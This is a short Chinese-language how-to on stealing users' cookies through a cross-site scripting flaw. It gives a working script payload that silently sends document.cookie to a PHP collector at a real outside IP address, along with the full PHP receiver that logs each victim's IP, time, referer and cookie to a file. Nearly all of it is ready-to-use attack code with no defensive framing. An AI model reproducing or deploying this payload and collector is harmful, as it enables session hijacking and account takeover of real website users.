原理:我们可以在有xss漏洞的网站插入跳入我们网站的xss代码,使用户触发漏洞的时候将cookie传入进来,我们进行接收
具体实现:
攻击代码:<script>document.write('<img src="http://1.117.107.31/getcookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script>
远程接收代码:
<?php
$cookie = $_GET['cookie'];
$ip = getenv('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookie.txt','a');
fwrite($fp,"IP:".$ip." | Date And Time:".$time." | Referer:".$referer." | Cookie:".$cookie." ||| ");
fclose($fp);
?>
最后实现通过xss漏洞盗取用户cookie的功能